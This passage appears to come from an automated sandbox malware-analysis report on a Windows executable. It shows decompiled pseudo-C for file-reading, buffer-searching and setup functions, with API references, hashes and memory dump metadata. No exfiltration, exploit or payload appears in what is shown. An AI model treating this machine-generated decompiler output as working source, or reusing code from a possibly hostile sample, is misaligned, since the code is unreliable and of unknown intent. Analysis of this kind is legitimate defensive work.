				intOrPtr* _t104;
				int _t108;
				void* _t111;
				void* _t112;

				_t86 = __ecx;
				E0041C1C0(0x1030, __ecx);
				_t104 = _t86;
				_v32 = __edx;
				_v52 = _t104;
				 *((intOrPtr*)( *_t104 + 0x10))(_t104, 0, 0, 0, 0);
				_t66 = _a8;
				 *((intOrPtr*)(_t66 + 4)) = 0;
				 *((char*)( *_t66)) = 0;
				_v20 = lstrlenA(_v32);
				_v36 = lstrlenA(_a4);
				_t108 = 0;
				_v5 = 0;
				_v28 = 0;
				_v24 = 0;
				while(1) {
					L2:
					_push( &_v48);
					_push(0x1000 - _t108);
					_push(_t111 + _t108 - 0x1030);
					_push(_t104); // executed
					if( *((intOrPtr*)( *_t104 + 0xc))() != 0) {
						break;
					}
					_t73 = _v48;
					if(_t73 == 0) {
						break;
					}
					_t74 = _t73 + _t108;
					_v44 = _t74;
					_v16 = 0;
					_v12 =  &_v4148;
					while(1) {
						L5:
						_t92 = _v16;
						_t99 = _t74;
						if(_v5 == 0) {
							break;
						}
						if(_t92 > _t99 - _v36) {
							L14:
							_v28 = _v28 + _t92;
							_t108 = _t74 - _t92;
							asm("adc [ebp-0x14], ebx");
							memmove( &_v4148, _t111 + _t92 - 0x1030, _t108);
							_t112 = _t112 + 0xc;
							if(_v24 > 0 || _v28 > 0x100000) {
								return 0 |  *((intOrPtr*)(_a8 + 4)) != 0x00000000;
							} else {
								_t104 = _v52;
								goto L2;
							}
						}
						_t81 = _v12;
						asm("repe cmpsb");
						if(0 == 0) {
							return 1;
						}
						_t83 =  *_t81;
						_v40 = _t83;
						if(_t83 == 0) {
							goto L18;
						}
						E00402F9F(_a8, _v40);
						_v16 = _v16 + 1;
						_v12 = _v12 + 1;
						_t74 = _v44;
					}
					if(_t92 > _t99 - _v20) {
						goto L14;
					}
					asm("repe cmpsb");
					if(0 != 0) {
						_v16 = _v16 + 1;
						_v12 = _v12 + 1;
					} else {
						_t95 = _v20;
						_v16 = _v16 + _t95;
						_v12 = _v12 + _t95;
						_v5 = 1;
					}
					goto L5;
				}
				L18:
				return 0;
			}





























                                          0x004030d6
                                          0x004030de
                                          0x004030eb
                                          0x004030f1
                                          0x004030f4
                                          0x004030f7
                                          0x004030fa
                                          0x00403106
                                          0x0040310b
                                          0x00403112
                                          0x00403117
                                          0x0040311a
                                          0x0040311c
                                          0x0040311f
                                          0x00403122
                                          0x0040312a
                                          0x0040312a
                                          0x0040312f
                                          0x00403137
                                          0x0040313f
                                          0x00403140
                                          0x00403146
                                          0x00000000
                                          0x00000000
                                          0x0040314c
                                          0x00403151
                                          0x00000000
                                          0x00000000
                                          0x00403157
                                          0x0040315f
                                          0x00403162
                                          0x00403165
                                          0x00403168
                                          0x00403168
                                          0x00403168
                                          0x0040316b
                                          0x00403170
                                          0x00000000
                                          0x00000000
                                          0x00403177
                                          0x004031de
                                          0x004031e0
                                          0x004031e3
                                          0x004031ec
                                          0x004031f8
                                          0x004031fe
                                          0x00403204
                                          0x00000000
                                          0x00403127
                                          0x00403127
                                          0x00000000
                                          0x00403127
                                          0x00403204
                                          0x00403179
                                          0x00403186
                                          0x00403188
                                          0x00000000
                                          0x00403220
                                          0x0040318e
                                          0x00403190
                                          0x00403195
                                          0x00000000
                                          0x00000000
                                          0x004031a1
                                          0x004031a6
                                          0x004031a9
                                          0x004031ac
                                          0x004031ac
                                          0x004031b6
                                          0x00000000
                                          0x00000000
                                          0x004031c3
                                          0x004031c5
                                          0x004031d6
                                          0x004031d9
                                          0x004031c7
                                          0x004031c7
                                          0x004031ca
                                          0x004031cd
                                          0x004031d0
                                          0x004031d0
                                          0x00000000
                                          0x004031c5
                                          0x00403224
                                          0x00000000

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00566858,00000000,?,00404E00,?,?,?,?,?), ref: 0040310D
                                          • lstrlenA.KERNEL32(00566858,?,00000000,00000000,00000000,00000000,?,00566858,00000000,?,00404E00,?,?,?,?,?), ref: 00403115
                                          • memmove.MSVCRT ref: 004031F8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: lstrlen$memmove
                                          • String ID:
                                          • API String ID: 1832346882-0
                                          • Opcode ID: 5822003b85987e6036de6aec5d2bc904ab5e1e21d5ee4ecd78f4138bcaa71753
                                          • Instruction ID: 93814ce0f0a0d2477efb8002a8279e42b82102d5932b68c1d783b4d7f2fd7925
                                          • Opcode Fuzzy Hash: 5822003b85987e6036de6aec5d2bc904ab5e1e21d5ee4ecd78f4138bcaa71753
                                          • Instruction Fuzzy Hash: D5412871D04258AFCB14CFA9D8808EEBBB9FF48351F1480AAE815B7341D7789E46CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405319, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E00405319(intOrPtr __ecx, char __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				intOrPtr* _v16;
				char _v20;
				void* _t11;
				void* _t15;
				intOrPtr _t19;
				void* _t34;

				_t34 = __eflags;
				_v8 = __edx;
				E004143C2(_t11,  &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ecx);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x10))();
				_t15 = E00404D7F(__ecx,  &_v20, _t34); // executed
				if(_t15 != 0 || _v8 != 0) {
					__eflags = _v16;
					if(__eflags == 0) {
						L8:
						_t25 = _a4;
						__eflags = _a4;
						if(_a4 != 0) {
							E0041447C(_t25,  &_v20);
						}
						goto L4;
					}
					_t19 = E0040502A( &_v20, 0, __eflags);
					__eflags = _t19;
					if(_t19 != 0) {
						goto L8;
					}
					_push(4);
					goto L3;
				} else {
					_push(9);
					_push(0);
					E00409684( &_v20);
					_push(3);
					L3:
					_pop(0);
					L4:
					_push(_v20);
					L0041C160();
					return 0;
				}
			}










                                          0x00405319
                                          0x00405326
                                          0x00405329
                                          0x00405332
                                          0x00405333
                                          0x00405334
                                          0x00405335
                                          0x00405336
                                          0x00405337
                                          0x0040533f
                                          0x00405346
                                          0x0040536b
                                          0x0040536e
                                          0x00405382
                                          0x00405382
                                          0x00405385
                                          0x00405387
                                          0x0040538d
                                          0x0040538d
                                          0x00000000
                                          0x00405387
                                          0x00405375
                                          0x0040537a
                                          0x0040537c
                                          0x00000000
                                          0x00000000
                                          0x0040537e
                                          0x00000000
                                          0x0040534d
                                          0x0040534d
                                          0x0040534f
                                          0x00405350
                                          0x00405357
                                          0x00405359
                                          0x00405359
                                          0x0040535a
                                          0x0040535a
                                          0x0040535d
                                          0x00405368
                                          0x00405368

                                          APIs
                                            • Part of subcall function 004143C2: ??2@YAPAXI@Z.MSVCRT ref: 004143CA
                                            • Part of subcall function 00404D7F: ??3@YAXPAX@Z.MSVCRT ref: 00404EF2
                                            • Part of subcall function 00404D7F: ??3@YAXPAX@Z.MSVCRT ref: 00404EFA
                                            • Part of subcall function 00404D7F: ??3@YAXPAX@Z.MSVCRT ref: 00404F02
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040535D
                                            • Part of subcall function 00409684: wvsprintfW.USER32(?,00000000,?), ref: 004096A7
                                            • Part of subcall function 00409684: GetLastError.KERNEL32 ref: 004096B8
                                            • Part of subcall function 00409684: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00566858), ref: 004096E0
                                            • Part of subcall function 00409684: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00566858), ref: 004096F5
                                            • Part of subcall function 00409684: lstrlenW.KERNEL32(?), ref: 00409708
                                            • Part of subcall function 00409684: lstrlenW.KERNEL32(?), ref: 0040970F
                                            • Part of subcall function 00409684: ??2@YAPAXI@Z.MSVCRT ref: 00409724
                                            • Part of subcall function 00409684: lstrcpyW.KERNEL32(00000000,?), ref: 0040973A
                                            • Part of subcall function 00409684: lstrcpyW.KERNEL32(-00000002,?), ref: 0040974C
                                            • Part of subcall function 00409684: ??3@YAXPAX@Z.MSVCRT ref: 00409756
                                            • Part of subcall function 00409684: LocalFree.KERNEL32(?), ref: 0040975F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                          • String ID: XhV
                                          • API String ID: 3247304187-2999104372
                                          • Opcode ID: a9f0acc5fd2654189d5bbd3698580afd54add0c88848862a7410559c596febd5
                                          • Instruction ID: d99cd7d07d450def43454dd97523081ea0e1bff39705ecaa915bff4ace688a24
                                          • Opcode Fuzzy Hash: a9f0acc5fd2654189d5bbd3698580afd54add0c88848862a7410559c596febd5
                                          • Instruction Fuzzy Hash: FA01D271604608AEEF14AAA49CC19BF7368EB10388F04447FF911371C2DAB95E048A9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004075CF, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E004075CF(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* _t8;
				int _t15;
				void* _t20;
				intOrPtr* _t24;
				signed int _t26;
				signed int _t27;

				_t20 = __edx;
				_t24 = __ecx;
				 *__ecx = 0x41ee80;
				E004147DF(_t8, __ecx + 0x3c);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0x18;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				_t26 =  *0x4228ac; // 0x280
				if(_t26 == 0) {
					_t27 =  *0x4228b0; // 0x1e0
					if(_t27 == 0) {
						GetSystemMetrics(0x10); // executed
						asm("cdq");
						 *0x4228ac = 0 - _t20 >> 1;
						_t15 = GetSystemMetrics(0x11);
						asm("cdq");
						 *0x4228b0 = _t15 - _t20 >> 1;
					}
				}
				return _t24;
			}









                                          0x004075cf
                                          0x004075d0
                                          0x004075d5
                                          0x004075db
                                          0x004075e2
                                          0x004075e5
                                          0x004075e8
                                          0x004075eb
                                          0x004075ee
                                          0x004075f5
                                          0x004075f8
                                          0x004075fe
                                          0x00407600
                                          0x00407606
                                          0x00407611
                                          0x00407613
                                          0x0040761a
                                          0x0040761f
                                          0x00407621
                                          0x00407626
                                          0x0040762b
                                          0x00407606
                                          0x0040762f

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • KiUserCallbackDispatcher.NTDLL ref: 00407611
                                          • GetSystemMetrics.USER32 ref: 0040761F
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@CallbackDispatcherMetricsSystemUser
                                          • String ID:
                                          • API String ID: 145748454-0
                                          • Opcode ID: 80a77b5a3344e25ea2b7d0931445c3057c7d5eaafae3869ce9cddb487c245e27
                                          • Instruction ID: 6ce0d3d2a294cc817c3ed94d35c4e8eadf3e8454e0af582e39282335f7eac732
                                          • Opcode Fuzzy Hash: 80a77b5a3344e25ea2b7d0931445c3057c7d5eaafae3869ce9cddb487c245e27
                                          • Instruction Fuzzy Hash: 14F01DB0A00B019FD3B0EF7D9D00686BBE5BB48310B458A3FD596C3690E7B4E4468F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413E3A, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E00413E3A(void** __ecx, long _a4, long _a8, long _a12, intOrPtr* _a16) {
				long _v8;
				long _t11;
				intOrPtr* _t13;
				void* _t14;
				long _t23;

				_push(__ecx);
				_v8 = _a8;
				_t11 = SetFilePointer( *__ecx, _a4,  &_v8, _a12); // executed
				_t23 = _t11;
				if(_t23 != 0xffffffff || GetLastError() == 0) {
					asm("adc edx, eax");
					_t13 = _a16;
					 *_t13 = 0 + _t23;
					 *((intOrPtr*)(_t13 + 4)) = _v8;
					_t14 = 1;
				} else {
					_t14 = 0;
				}
				return _t14;
			}








                                          0x00413e3d
                                          0x00413e47
                                          0x00413e56
                                          0x00413e5c
                                          0x00413e61
                                          0x00413e7a
                                          0x00413e7c
                                          0x00413e7f
                                          0x00413e81
                                          0x00413e84
                                          0x00413e6d
                                          0x00413e6d
                                          0x00413e6d
                                          0x00413e88

                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00413E56
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00413E63
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 007787c2f3829a3ae304c77fe7b9cc5777807232d41288a06886aba40bf6d8ab
                                          • Instruction ID: e393e3b0b581c03f2e1373165af33d27313eb1f81299ccbe74c3423d21431cf3
                                          • Opcode Fuzzy Hash: 007787c2f3829a3ae304c77fe7b9cc5777807232d41288a06886aba40bf6d8ab
                                          • Instruction Fuzzy Hash: 27F03AB5A00318AF8F00CF68DC049DB7BE9AF49320B148169E816D73A1E635DE51EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C172, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __dllonexit_onexit
                                          • String ID:
                                          • API String ID: 2384194067-0
                                          • Opcode ID: 3f6902fc8b7ba21d02d425c2127135aaf0fa078405c295ac591937e8f1ed3469
                                          • Instruction ID: d90210f8ed818c547b06286f749277b62e7de9e8c25a3e05c31bbee2e42e59a4
                                          • Opcode Fuzzy Hash: 3f6902fc8b7ba21d02d425c2127135aaf0fa078405c295ac591937e8f1ed3469
                                          • Instruction Fuzzy Hash: 8CC0C7745C6200F6D5212711FD055957611D650721BA1C366B0A9114E187394411B909
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418B0C, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00418B0C() {
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t66;
				intOrPtr* _t67;
				void* _t78;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				void* _t85;
				void* _t87;

				L0041C1F0();
				 *((intOrPtr*)(_t85 - 0x10)) = _t87 - 0x88;
				 *(_t85 - 4) = 0;
				_t83 =  *((intOrPtr*)(_t85 + 8));
				 *((intOrPtr*)( *_t83 + 0x10))(_t83, _t78, _t82, _t66);
				 *(_t85 - 4) = 1;
				_t67 =  *((intOrPtr*)(_t85 + 0x14));
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67 + 4))(_t67);
				}
				 *((intOrPtr*)(_t85 + 0x14)) = 0;
				_t91 = _t67;
				if(_t67 != 0) {
					 *((intOrPtr*)( *_t67))(_t67, 0x41d530, _t85 + 0x14);
				}
				 *((intOrPtr*)(_t85 - 0x94)) = 0;
				 *((intOrPtr*)(_t85 - 0x90)) = 0;
				 *((char*)(_t85 - 0x1c)) = 1;
				 *((char*)(_t83 + 0x140)) = 0;
				_push( *((intOrPtr*)(_t85 + 0x10)));
				_t80 = E00419788(_t85 - 0x94, _t91,  *((intOrPtr*)(_t85 + 0xc)));
				if(_t80 == 0) {
					 *((char*)(_t83 + 0x140)) = 1;
					_push(_t83 + 0x14c);
					_push(_t83 + 0x149);
					_push(_t83 + 0x148);
					_push( *((intOrPtr*)(_t85 + 0x14)));
					_push(_t83 + 0x10);
					_t47 = E0041B0DD(_t85 - 0x94); // executed
					_t80 = _t47;
					__eflags = _t80;
					if(_t80 != 0) {
						goto L5;
					} else {
						E004160A2(_t83 + 0xc,  *((intOrPtr*)(_t85 + 0xc)));
						_t56 =  *((intOrPtr*)(_t85 - 0x94));
						__eflags = _t56;
						if(_t56 != 0) {
							 *((intOrPtr*)( *_t56 + 8))(_t56);
						}
						_t57 =  *((intOrPtr*)(_t85 + 0x14));
						__eflags = _t57;
						if(_t57 != 0) {
							 *((intOrPtr*)( *_t57 + 8))(_t57);
						}
						__eflags = _t67;
						if(_t67 != 0) {
							 *((intOrPtr*)( *_t67 + 8))(_t67);
						}
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t50 = 0;
					}
				} else {
					L5:
					_t48 =  *((intOrPtr*)(_t85 - 0x94));
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 =  *((intOrPtr*)(_t85 + 0x14));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49 + 8))(_t49);
					}
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t50 = _t80;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t50;
			}

















                                          0x00418b11
                                          0x00418b1f
                                          0x00418b24
                                          0x00418b27
                                          0x00418b2d
                                          0x00418b30
                                          0x00418b34
                                          0x00418b39
                                          0x00418b3e
                                          0x00418b3e
                                          0x00418b41
                                          0x00418b44
                                          0x00418b46
                                          0x00418b54
                                          0x00418b54
                                          0x00418b56
                                          0x00418b5c
                                          0x00418b62
                                          0x00418b66
                                          0x00418b6d
                                          0x00418b7e
                                          0x00418b82
                                          0x00418bb2
                                          0x00418bbf
                                          0x00418bc6
                                          0x00418bcd
                                          0x00418bce
                                          0x00418bd4
                                          0x00418bdb
                                          0x00418be0
                                          0x00418be2
                                          0x00418be4
                                          0x00000000
                                          0x00418be6
                                          0x00418bec
                                          0x00418bf1
                                          0x00418bf7
                                          0x00418bf9
                                          0x00418bfe
                                          0x00418bfe
                                          0x00418c01
                                          0x00418c04
                                          0x00418c06
                                          0x00418c0b
                                          0x00418c0b
                                          0x00418c0e
                                          0x00418c10
                                          0x00418c15
                                          0x00418c15
                                          0x00418c18
                                          0x00418c1c
                                          0x00418c1c
                                          0x00418b84
                                          0x00418b84
                                          0x00418b84
                                          0x00418b8c
                                          0x00418b91
                                          0x00418b91
                                          0x00418b94
                                          0x00418b99
                                          0x00418b9e
                                          0x00418b9e
                                          0x00418ba3
                                          0x00418ba8
                                          0x00418ba8
                                          0x00418bab
                                          0x00418bab
                                          0x00418c42
                                          0x00418c4d

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 00418B11
                                            • Part of subcall function 0041B0DD: _EH_prolog.MSVCRT ref: 0041B0E2
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: b48e2961efca33cdc268dc06a9db708dae6e35986a8212076dca9429ba69aabe
                                          • Instruction ID: 224d0b28c9c96a8b720adceb05dc78df915ef04c78251989e0adf3722648e023
                                          • Opcode Fuzzy Hash: b48e2961efca33cdc268dc06a9db708dae6e35986a8212076dca9429ba69aabe
                                          • Instruction Fuzzy Hash: CC418871600609AFCB21CF64C884BDBB7B9AF44304F0444AEF84ADB251DB39ED81CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B0DD, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0041B0DD(signed int __ecx) {
				void* _t17;
				signed int _t26;
				void* _t31;
				intOrPtr _t33;

				_t23 = __ecx;
				L0041C1F0();
				_push(__ecx);
				 *((intOrPtr*)(_t31 - 0x10)) = _t33;
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				_t26 =  *((intOrPtr*)(_t31 + 8));
				_t17 = E0041AE02(__ecx, _t26,  *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18))); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t26 + 0x132)) = 1;
				}
				if(_t17 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
					return _t17;
				} else {
					E00418E04(_t23);
					 *((char*)( *((intOrPtr*)(_t31 + 8)) + 0x136)) = 1;
					 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
					return E0041B136;
				}
			}







                                          0x0041b0dd
                                          0x0041b0e2
                                          0x0041b0e7
                                          0x0041b0eb
                                          0x0041b0f0
                                          0x0041b100
                                          0x0041b104
                                          0x0041b10d
                                          0x0041b10f
                                          0x0041b10f
                                          0x0041b11b
                                          0x0041b13c
                                          0x0041b147
                                          0x0041b11d
                                          0x0041b11d
                                          0x0041b125
                                          0x0041b12c
                                          0x0041b135
                                          0x0041b135

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 667eae066e17802bf22880d5056c4320b86ac6ca1fb471da5ead366e8fa87735
                                          • Instruction ID: 7f33fe341473cbd1ce67957057ba73322e56dc0cdd0527969264fce869e679db
                                          • Opcode Fuzzy Hash: 667eae066e17802bf22880d5056c4320b86ac6ca1fb471da5ead366e8fa87735
                                          • Instruction Fuzzy Hash: 25F0FF32540248BFDB21CF58C986BDEBBB1EB00368F08855EF80592261C3799990CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413FD8, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00413FD8(signed int* __ecx, void* __eflags, WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t8;
				signed int _t9;
				signed int* _t13;

				_t13 = __ecx;
				_t8 = E00413DDA(__ecx);
				if(_t8 != 0) {
					_t9 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
					 *_t13 = _t9;
					return _t9 & 0xffffff00 | _t9 != 0xffffffff;
				}
				return _t8;
			}






                                          0x00413fdc
                                          0x00413fde
                                          0x00413fe5
                                          0x00413ffa
                                          0x00414005
                                          0x00000000
                                          0x00414007
                                          0x0041400c

                                          APIs
                                            • Part of subcall function 00413DDA: CloseHandle.KERNEL32(?,00000014,00413FE3,00000000,?,00414029,?,80000000,00000000,00000000,00000000,0041404C,00000000,?,00000003,00000080), ref: 00413DE5
                                          • CreateFileW.KERNELBASE(?,0040995F,00000000,00000000,?,0041405A,00000000,00000000,?,00414029,?,80000000,00000000,00000000,00000000,0041404C), ref: 00413FFA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseCreateFileHandle
                                          • String ID:
                                          • API String ID: 3498533004-0
                                          • Opcode ID: 5ea8ab8a2c0165d1c32804d1041ac21f8da3c3234316c2d1c2c91c72e9c780df
                                          • Instruction ID: 25576dffacfddd49299a2c5938d5f916c6c0a3737d2a1d54cb842f78843bf2a4
                                          • Opcode Fuzzy Hash: 5ea8ab8a2c0165d1c32804d1041ac21f8da3c3234316c2d1c2c91c72e9c780df
                                          • Instruction Fuzzy Hash: 47E08632100219BBCF211FA49C02BCA3F56AF18360F108116FB11561E0C772D4B0AB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413EA1, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E00413EA1(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                          0x00413ea4
                                          0x00413ea5
                                          0x00413eb7
                                          0x00413ec5
                                          0x00413ecb

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00413EB7
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: aaa7fc0bee448c6a2f67fcdb91d4647745e8fe0572ea30e5d88b75afb862a541
                                          • Instruction ID: 9b454950ea75836eca7fe91a31d8659671653d16dcec92d246dd104a82401603
                                          • Opcode Fuzzy Hash: aaa7fc0bee448c6a2f67fcdb91d4647745e8fe0572ea30e5d88b75afb862a541
                                          • Instruction Fuzzy Hash: E2E0EC75600208FFDB01CF90CD01FDE7BBEEB49758F208058E90496160C775DA10EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C173, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _onexit
                                          • String ID:
                                          • API String ID: 572287377-0
                                          • Opcode ID: 70708c98d1dc7566571e7de0e536aad1ca2b822a7fd5c0d4cc40cf7eb4ca856a
                                          • Instruction ID: 06dc4e053ff0de979efe87a70d7ae25a0d5be0b6429467df7d2fad60ad11e5ea
                                          • Opcode Fuzzy Hash: 70708c98d1dc7566571e7de0e536aad1ca2b822a7fd5c0d4cc40cf7eb4ca856a
